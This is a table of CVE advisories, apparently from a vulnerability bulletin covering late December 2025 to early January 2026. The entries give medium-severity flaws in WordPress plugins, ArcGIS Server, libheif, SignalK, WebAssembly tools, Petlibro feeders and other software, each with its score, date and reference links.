| Funnelforms--Funnelforms Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Funnelforms Funnelforms Free allows DOM-Based XSS.This issue affects Funnelforms Free: from n/a through 3.8. | 2025-12-31 | 6.5 | CVE-2025-62758 | https://vdp.patchstack.com/database/wordpress/plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Justin Tadlock--Series | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Tadlock Series allows Stored XSS.This issue affects Series: from n/a through 2.0.1. | 2025-12-31 | 6.5 | CVE-2025-62759 | https://vdp.patchstack.com/database/wordpress/plugin/series/vulnerability/wordpress-series-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| BuddyDev--BuddyPress Activity Shortcode | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev BuddyPress Activity Shortcode allows Stored XSS.This issue affects BuddyPress Activity Shortcode: from n/a through 1.1.8. | 2025-12-31 | 6.5 | CVE-2025-62760 | https://vdp.patchstack.com/database/wordpress/plugin/bp-activity-shortcode/vulnerability/wordpress-buddypress-activity-shortcode-plugin-1-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| BasePress--Knowledge Base documentation & wiki plugin BasePress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BasePress Knowledge Base documentation & wiki plugin - BasePress allows Stored XSS.This issue affects Knowledge Base documentation & wiki plugin - BasePress: from n/a through 2.17.0.1. | 2025-12-31 | 6.5 | CVE-2025-62761 | https://vdp.patchstack.com/database/wordpress/plugin/basepress/vulnerability/wordpress-knowledge-base-documentation-wiki-plugin-basepress-plugin-2-17-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Livemesh--Livemesh Addons for Beaver Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Beaver Builder addons-for-beaver-builder allows Stored XSS.This issue affects Livemesh Addons for Beaver Builder: from n/a through 3.9.2. | 2025-12-31 | 6.5 | CVE-2025-62990 | https://vdp.patchstack.com/database/wordpress/plugin/addons-for-beaver-builder/vulnerability/wordpress-livemesh-addons-for-beaver-builder-plugin-3-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Minamaze | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Minamaze allows Stored XSS.This issue affects Minamaze: from n/a through 1.10.1. | 2025-12-31 | 6.5 | CVE-2025-62991 | https://vdp.patchstack.com/database/wordpress/theme/minamaze/vulnerability/wordpress-minamaze-theme-1-10-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Everest themes--Everest Backup | Cross-Site Request Forgery (CSRF) vulnerability in Everest themes Everest Backup allows Path Traversal.This issue affects Everest Backup: from n/a through 2.3.9. | 2025-12-31 | 6.5 | CVE-2025-62992 | https://vdp.patchstack.com/database/wordpress/plugin/everest-backup/vulnerability/wordpress-everest-backup-plugin-2-3-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WP for church--Sermon Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP for church Sermon Manager allows Stored XSS.This issue affects Sermon Manager: from n/a through 2.30.0. | 2025-12-31 | 6.5 | CVE-2025-63000 | https://vdp.patchstack.com/database/wordpress/plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tomas--WordPress Tooltips | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tomas WordPress Tooltips allows Stored XSS.This issue affects WordPress Tooltips: from n/a through 10.7.9. | 2025-12-31 | 6.5 | CVE-2025-63005 | https://vdp.patchstack.com/database/wordpress/plugin/wordpress-tooltips/vulnerability/wordpress-wordpress-tooltips-plugin-10-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wayne Allen--Postie | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wayne Allen Postie postie allows Stored XSS.This issue affects Postie: from n/a through 1.9.73. | 2025-12-31 | 6.5 | CVE-2025-63020 | https://vdp.patchstack.com/database/wordpress/plugin/postie/vulnerability/wordpress-postie-plugin-1-9-73-cross-site-scripting-xss-vulnerability?_s_id=cve |
| codetipi--Valenti Engine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codetipi Valenti Engine allows DOM-Based XSS.This issue affects Valenti Engine: from n/a through 1.0.3. | 2025-12-31 | 6.5 | CVE-2025-63021 | https://vdp.patchstack.com/database/wordpress/plugin/valenti-engine/vulnerability/wordpress-valenti-engine-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Webcreations907--WBC907 Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webcreations907 WBC907 Core allows Stored XSS.This issue affects WBC907 Core: from n/a through 3.4.1. | 2025-12-30 | 6.5 | CVE-2025-63027 | https://vdp.patchstack.com/database/wordpress/plugin/wbc907-core/vulnerability/wordpress-wbc907-core-plugin-3-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Consulting | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Consulting allows Stored XSS.This issue affects Consulting: from n/a through 1.5.0. | 2025-12-31 | 6.5 | CVE-2025-63032 | https://vdp.patchstack.com/database/wordpress/theme/consulting/vulnerability/wordpress-consulting-theme-1-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| 8theme.com--XStore Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 8theme.Com XStore Core allows DOM-Based XSS.This issue affects XStore Core: from n/a before 5.6. | 2025-12-30 | 6.5 | CVE-2025-64190 | https://vdp.patchstack.com/database/wordpress/plugin/et-core-plugin/vulnerability/wordpress-xstore-core-plugin-5-6-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| dmccan--Yada Wiki | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yada Wiki yada-wiki allows Stored XSS.This issue affects Yada Wiki: from n/a through 3.5. | 2025-12-30 | 6.5 | CVE-2025-66094 | https://vdp.patchstack.com/database/wordpress/plugin/yada-wiki/vulnerability/wordpress-yada-wiki-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Revmakx--WPCal.io | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Revmakx WPCal.Io allows DOM-Based XSS.This issue affects WPCal.Io: from n/a through 0.9.5.9. | 2025-12-30 | 6.5 | CVE-2025-66103 | https://vdp.patchstack.com/database/wordpress/plugin/wpcal/vulnerability/wordpress-wpcal-io-plugin-0-9-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67703 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67704 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67705 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67708 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67709 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67710 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| Esri--ArcGIS Server | There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim's browser. | 2025-12-31 | 6.1 | CVE-2025-67711 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch |
| weDevs--WP Project Manager | Insertion of Sensitive Information Into Sent Data vulnerability in weDevs WP Project Manager wedevs-project-manager allows Retrieve Embedded Sensitive Data.This issue affects WP Project Manager: from n/a through 3.0.1. | 2025-12-29 | 6.5 | CVE-2025-68040 | https://vdp.patchstack.com/database/wordpress/plugin/wedevs-project-manager/vulnerability/wordpress-wp-project-manager-plugin-2-6-29-sensitive-data-exposure-vulnerability?_s_id=cve |
| strukturag--libheif | libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes. | 2025-12-29 | 6.5 | CVE-2025-68431 | https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46 https://github.com/strukturag/libheif/releases/tag/v1.21.0 |
| Crocoblock--JetTabs | Missing Authorization vulnerability in Crocoblock JetTabs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetTabs: from n/a through 2.2.12. | 2025-12-29 | 6.5 | CVE-2025-68498 | https://vdp.patchstack.com/database/wordpress/plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-broken-access-control-vulnerability?_s_id=cve |
| Crocoblock--JetTabs | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetTabs allows DOM-Based XSS.This issue affects JetTabs: from n/a through 2.2.12. | 2025-12-29 | 6.5 | CVE-2025-68499 | https://vdp.patchstack.com/database/wordpress/plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Crocoblock--JetBlog | Missing Authorization vulnerability in Crocoblock JetBlog allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetBlog: from n/a through 2.4.7. | 2025-12-29 | 6.5 | CVE-2025-68503 | https://vdp.patchstack.com/database/wordpress/plugin/jet-blog/vulnerability/wordpress-jetblog-plugin-2-4-7-broken-access-control-vulnerability?_s_id=cve |
| Crocoblock--JetSearch | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetSearch allows DOM-Based XSS.This issue affects JetSearch: from n/a through 3.5.16. | 2025-12-29 | 6.5 | CVE-2025-68504 | https://vdp.patchstack.com/database/wordpress/plugin/jet-search/vulnerability/wordpress-jetsearch-plugin-3-5-16-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hiroaki Miyashita--Custom Field Template | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS.This issue affects Custom Field Template: from n/a through 2.7.5. | 2025-12-29 | 6.5 | CVE-2025-68607 | https://vdp.patchstack.com/database/wordpress/plugin/custom-field-template/vulnerability/wordpress-custom-field-template-plugin-2-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Codeaffairs--Wp Text Slider Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeaffairs Wp Text Slider Widget allows Stored XSS.This issue affects Wp Text Slider Widget: from n/a through 1.0. | 2025-12-29 | 6.5 | CVE-2025-68868 | https://vdp.patchstack.com/database/wordpress/plugin/wp-text-slider-widget/vulnerability/wordpress-wp-text-slider-widget-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Versions prior to 2.19.0 of the access request system have two related features that when combined by themselves and with an information disclosure vulnerability enable convincing social engineering attacks against administrators. When a device creates an access request, it specifies three fields: `clientId`, `description`, and `permissions`. The SignalK admin UI displays the `description` field prominently to the administrator when showing pending requests, but the actual `permissions` field (which determines the access level granted) is less visible or displayed separately. This allows an attacker to request `admin` permissions while providing a description that suggests readonly access. The access request handler trusts the `X-Forwarded-For` HTTP header without validation to determine the client's IP address. This header is intended to preserve the original client IP when requests pass through reverse proxies, but when trusted unconditionally, it allows attackers to spoof their IP address. The spoofed IP is displayed to administrators in the access request approval interface, potentially making malicious requests appear to originate from trusted internal network addresses. Since device/source names can be enumerated via the information disclosure vulnerability, an attacker can impersonate a legitimate device or source, craft a convincing description, spoof a trusted internal IP address, and request elevated permissions, creating a highly convincing social engineering scenario that increases the likelihood of administrator approval. Users should upgrade to version 2.19.0 to fix this issue. | 2026-01-01 | 6.3 | CVE-2025-69203 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-vfrf-vcj7-wvr8 https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| olell--uURU | Micro Registration Utility (µURU) is a telephone self registration utility based on asterisk. In versions up to and including commit 88db9a953f38a3026bcd6816d51c7f3b93c55893, an attacker can crafts a special federation name and characters treated special by asterisk can be injected into the `Dial( )` application due to improper input validation. This allows an attacker to redirect calls on both of the federating instances. If the attack succeeds, the impact is very high. However, the requires that an admin accept the federation requests. As of time of publication, a known patched version of µURU is not available. | 2025-12-29 | 6.3 | CVE-2025-69205 | https://github.com/olell/uURU/security/advisories/GHSA-xvrh-pm3f-79v4 https://docs.asterisk.org/Latest_API/API_Documentation/Dialplan_Applications/Dial |
| AsfhtgkDavid--theshit | theshit is a command-line utility that automatically detects and fixes common mistakes in shell commands. Prior to version 0.1.1, the application loads custom Python rules and configuration files from user-writable locations (e.g., `~/.config/theshit/`) without validating ownership or permissions when executed with elevated privileges. If the tool is invoked with `sudo` or otherwise runs with an effective UID of root, it continues to trust configuration files originating from the unprivileged user's environment. This allows a local attacker to inject arbitrary Python code via a malicious rule or configuration file, which is then executed with root privileges. Any system where this tool is executed with elevated privileges is affected. In environments where the tool is permitted to run via `sudo` without a password (`NOPASSWD`), a local unprivileged user can escalate privileges to root without additional interaction. The issue has been fixed in version 0.1.1. The patch introduces strict ownership and permission checks for all configuration files and custom rules. The application now enforces that rules are only loaded if they are owned by the effective user executing the tool. When executed with elevated privileges (`EUID=0`), the application refuses to load any files that are not owned by root or that are writable by non-root users. When executed as a non-root user, it similarly refuses to load rules owned by other users. This prevents both vertical and horizontal privilege escalation via execution of untrusted code. If upgrading is not possible, users should avoid executing the application with `sudo` or as the root user. As a temporary mitigation, ensure that directories containing custom rules and configuration files are owned by root and are not writable by non-root users. Administrators may also audit existing custom rules before running the tool with elevated privileges. | 2025-12-30 | 6.7 | CVE-2025-69257 | https://github.com/AsfhtgkDavid/theshit/security/advisories/GHSA-95qg-89c2-w5hj https://github.com/AsfhtgkDavid/theshit/commit/8e0b565e7876a83b0e1cfbacb8af39dadfdcc500 |
| PHPGurukul--Online Course Registration | A vulnerability was found in PHPGurukul Online Course Registration up to 3.1. This issue affects some unknown processing of the file /admin/edit-student-profile.php of the component Student Registration Page. The manipulation of the argument photo results in unrestricted upload. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-01-02 | 6.3 | CVE-2026-0547 | VDB-339355 | PHPGurukul Online Course Registration Student Registration edit-student-profile.php unrestricted upload VDB-339355 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728988 | PHPGurukul Online Course Registration v3.1 Cross Site Scripting https://github.com/rsecroot/Online-Course-Registration/blob/main/Cross%20Site%20Scripting.md https://phpgurukul.com/ |
| yeqifu--warehouse | A weakness has been identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function saveUserRole of the file warehouse\src\main\java\com\yeqifu\sys\controller\UserController.java of the component Request Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. | 2026-01-04 | 6.3 | CVE-2026-0574 | VDB-339458 | yeqifu warehouse Request UserController.java saveUserRole improper authorization VDB-339458 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729374 | yeqifu warehouse aaf29962ba407d22d991781de28796ee7b4670e4 vertical privilege escalation https://github.com/5i1encee/Vul/blob/main/Vertical_privilege_escalation_Vulnerability_in_Project_yeqifu_warehouse.md https://github.com/5i1encee/Vul/blob/main/Vertical_privilege_escalation_Vulnerability_in_Project_yeqifu_warehouse.md#poc |
| code-projects--Online Product Reservation System | A flaw has been found in code-projects Online Product Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file /handgunner-administrator/prod.php. Executing manipulation can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-04 | 6.3 | CVE-2026-0577 | VDB-339461 | code-projects Online Product Reservation System prod.php unrestricted upload VDB-339461 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731015 | code-projects Online Product Reservation system in PHP with source code V1.0 Unrestricted Upload https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/file_upload_prod.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/file_upload_prod.php.md#poc https://code-projects.org/ |
| STVS SA--STVS ProVision | STVS ProVision 5.9.10 contains a cross-site scripting vulnerability in the 'files' POST parameter that allows authenticated attackers to inject arbitrary HTML code. Attackers can exploit the unvalidated input to execute malicious scripts within a user's browser session in the context of the affected site. | 2025-12-31 | 5.4 | CVE-2021-47725 | Zero Science Lab Disclosure (ZSL-2021-5624) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Vendor Homepage VulnCheck Advisory: STVS ProVision 5.9.10 Authenticated Reflected Cross-Site Scripting via Files Parameter |
| CodexThemes--TheGem (Elementor) | Vulnerability in CodexThemes TheGem (Elementor), CodexThemes TheGem (WPBakery).This issue affects TheGem (Elementor): from n/a before 5.8.1.1; TheGem (WPBakery): from n/a before 5.8.1.1. | 2025-12-29 | 5.4 | CVE-2023-32238 | https://vdp.patchstack.com/database/wordpress/theme/thegem-elementor/vulnerability/wordpress-thegem-elementor-theme-5-7-2-broken-access-control-vulnerability?_s_id=cve |
| wpdive--Better Elementor Addons | Missing Authorization vulnerability in wpdive Better Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Elementor Addons: from n/a through 1.3.7. | 2025-12-29 | 5.4 | CVE-2023-41656 | https://vdp.patchstack.com/database/wordpress/plugin/better-elementor-addons/vulnerability/wordpress-better-elementor-addons-plugin-1-3-5-broken-access-control-vulnerability?_s_id=cve |
| tareq1988--User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration | The Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission - WP User Frontend plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'Frontend_Form_Ajax::submit_post' function in all versions up to, and including, 4.2.4. This makes it possible for unauthenticated attackers to delete attachment. | 2026-01-02 | 5.3 | CVE-2025-14047 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e95b16f-a25a-45c7-a875-2d34a1e127ce?source=cve https://plugins.trac.wordpress.org/changeset/3430352/wp-user-frontend/trunk/includes/Ajax/Frontend_Form_Ajax.php https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L25 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax.php#L69 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L35 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L55 https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L133 |
| pixelyoursite--PixelYourSite Your smart PIXEL (TAG) & API Manager | The PixelYourSite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.1.5 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files, when the "Meta API logs" setting is enabled (disabled by default). The vulnerability was partially patched in version 11.1.5 and fully patched in version 11.1.5.1. | 2025-12-29 | 5.3 | CVE-2025-14280 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe77926-8a43-42ce-9d3d-3aac2334dcbd?source=cve https://plugins.trac.wordpress.org/browser/pixelyoursite/tags/11.1.4.2/includes/logger/class-pys-logger.php#L118 https://plugins.trac.wordpress.org/changeset/3424175/pixelyoursite https://plugins.trac.wordpress.org/changeset/3416113/pixelyoursite |
| Gmission--Web Fax | Exposure of Sensitive Information to an Unauthorized Actor, Missing Authorization vulnerability in Gmission Web Fax allows Authentication Abuse.This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 5.5 | CVE-2025-15070 | https://www.gmission.co.kr/fax1 |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.5. This affects the function decode_ipv6_header/ogs_pfcp_pdr_rule_find_by_packet of the file lib/pfcp/rule-match.c of the component PFCP Session Establishment Request Handler. Executing manipulation can lead to reachable assertion. It is possible to launch the attack remotely. The exploit has been published and may be used. This patch is called b72d8349980076e2c033c8324f07747a86eea4f8. Applying a patch is advised to resolve this issue. | 2025-12-29 | 5.3 | CVE-2025-15176 | VDB-338561 | Open5GS PFCP Session Establishment Request rule-match.c ogs_pfcp_pdr_rule_find_by_packet assertion VDB-338561 | CTI Indicators (IOB, IOC, IOA) Submit #719830 | Open5GS v2.7.5 Reachable Assertion https://github.com/open5gs/open5gs/issues/4180 https://github.com/open5gs/open5gs/issues/4180#issuecomment-3615555671 https://github.com/open5gs/open5gs/issues/4180#issue-3666760066 https://github.com/open5gs/open5gs/commit/b72d8349980076e2c033c8324f07747a86eea4f8 |
| Dromara--Sa-Token | A vulnerability has been found in Dromara Sa-Token up to 1.44.0. This issue affects the function ObjectInputStream.readObject of the file SaSerializerTemplateForJdkUseBase64.java. Such manipulation leads to deserialization. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 5 | CVE-2025-15222 | VDB-338607 | Dromara Sa-Token SaSerializerTemplateForJdkUseBase64.java ObjectInputStream.readObject deserialization VDB-338607 | CTI Indicators (IOB, IOC, IOA) Submit #717703 | https://github.com/dromara/sa-token Sa-Token <=1.44.0 Deserialization https://github.com/Yohane-Mashiro/satoken-deserialization |
| Tenda--CH22 | A vulnerability has been found in Tenda CH22 up to 1.0.0.1. Affected by this vulnerability is the function fromDhcpListClient of the file /goform/DhcpListClient. Such manipulation of the argument LISTLEN leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 5.3 | CVE-2025-15229 | VDB-338625 | Tenda CH22 DhcpListClient fromDhcpListClient denial of service VDB-338625 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725472 | Tenda CH22 V1.0.0.1 Denial of Service https://github.com/master-abc/cve/issues/7 https://www.tenda.com.cn/ |
| beecue--FastBee | A vulnerability was detected in beecue FastBee up to 2.1. Impacted is the function getRootElement of the file springboot/fastbee-server/sip-server/src/main/java/com/fastbee/sip/handler/req/ReqAbstractHandler.java of the component SIP Message Handler. The manipulation results in xml external entity reference. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. The project owner replied to the issue report: "Okay, we'll handle it as soon as possible." | 2025-12-30 | 5.6 | CVE-2025-15251 | VDB-338641 | beecue FastBee SIP Message ReqAbstractHandler.java getRootElement xml external entity reference VDB-338641 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/beecue/fastbee/issues/ID7HNZ https://gitee.com/beecue/fastbee/issues/ID7HNZ#note_47777408_link |
| WebAssembly--wabt | A weakness has been identified in WebAssembly wabt up to 1.0.39. This vulnerability affects the function wabt::AST::InsertNode of the file /src/repro/wabt/bin/wasm-decompile of the component wasm-decompile. This manipulation causes memory corruption. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. Unfortunately, the project has no active maintainer at the moment. In a reply to the issue report somebody recommended to the researcher to provide a PR himself. | 2026-01-01 | 5.3 | CVE-2025-15411 | VDB-339332 | WebAssembly wabt wasm-decompile InsertNode memory corruption VDB-339332 | CTI Indicators (IOB, IOC, IOA) Submit #719825 | WebAssembly wabt 1.0.39 and master-branch Heap-based Buffer Overflow https://github.com/WebAssembly/wabt/issues/2679 https://github.com/oneafter/1208/blob/main/af1 |
| WebAssembly--wabt | A security vulnerability has been detected in WebAssembly wabt up to 1.0.39. This issue affects the function wabt::Decompiler::VarName of the file /src/repro/wabt/bin/wasm-decompile of the component wasm-decompile. Such manipulation leads to out-of-bounds read. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. Unfortunately, the project has no active maintainer at the moment. In a reply to the issue report somebody recommended to the researcher to provide a PR himself. | 2026-01-01 | 5.3 | CVE-2025-15412 | VDB-339333 | WebAssembly wabt wasm-decompile VarName out-of-bounds VDB-339333 | CTI Indicators (IOB, IOC, IOA) Submit #719826 | WebAssembly wabt 1.0.39 and master-branch Memory Corruption https://github.com/WebAssembly/wabt/issues/2678 https://github.com/oneafter/1208/blob/main/af1 |
| n/a--wasm3 | A vulnerability was detected in wasm3 up to 0.5.0. Impacted is the function op_SetSlot_i32/op_CallIndirect of the file m3_exec.h. Performing manipulation results in memory corruption. The attack needs to be approached locally. The exploit is now public and may be used. Unfortunately, the project has no active maintainer at the moment. | 2026-01-01 | 5.3 | CVE-2025-15413 | VDB-339334 | wasm3 m3_exec.h op_CallIndirect memory corruption VDB-339334 | CTI Indicators (IOB, IOC, IOA) Submit #719829 | wasm3 v0.5.0 and master-branch Memory Corruption Submit #719831 | wasm3 v0.5.0 and master-branch Memory Corruption (Duplicate) https://github.com/wasm3/wasm3/issues/543 https://github.com/wasm3/wasm3/issues/547 |
| EmpireSoft--EmpireCMS | A flaw has been found in EmpireSoft EmpireCMS up to 8.0. This issue affects the function egetip of the file e/class/connect.php of the component IP Address Handler. This manipulation causes protection mechanism failure. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 5.3 | CVE-2025-15422 | VDB-339344 | EmpireSoft EmpireCMS IP Address connect.php egetip protection mechanism VDB-339344 | CTI Indicators (IOB, IOC, IOA) Submit #721344 | EmpireCMS <=8.0 Privilege Escalation https://note-hxlab.wetolink.com/share/0x74KEtzecFb https://note-hxlab.wetolink.com/share/0x74KEtzecFb#-span--strong-proof-of-concept---strong---span- |
| yeqifu--carRental | A vulnerability has been found in yeqifu carRental up to 3fabb7eae93d209426638863980301d6f99866b3. This vulnerability affects the function downloadShowFile of the file /file/downloadShowFile.action of the component com.yeqifu.sys.controller.FileController. The manipulation of the argument path leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-02 | 5.3 | CVE-2025-15432 | VDB-339354 | yeqifu carRental com.yeqifu.sys.controller.FileController downloadShowFile.action downloadShowFile path traversal VDB-339354 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723220 | https://github.com/yeqifu carRental latest Path Traversal https://github.com/yeqifu/carRental/issues/46 |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings. | 2026-01-03 | 5.3 | CVE-2025-3652 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Audio Information Disclosure via API endpoint |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to device hardware information by exploiting insecure API endpoints. Attackers can retrieve device serial numbers and MAC addresses through /device/devicePetRelation/getBoundDevices using pet IDs, enabling full device control without proper authorization checks. | 2026-01-03 | 5.3 | CVE-2025-3654 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Information Disclosure via API endpoint |
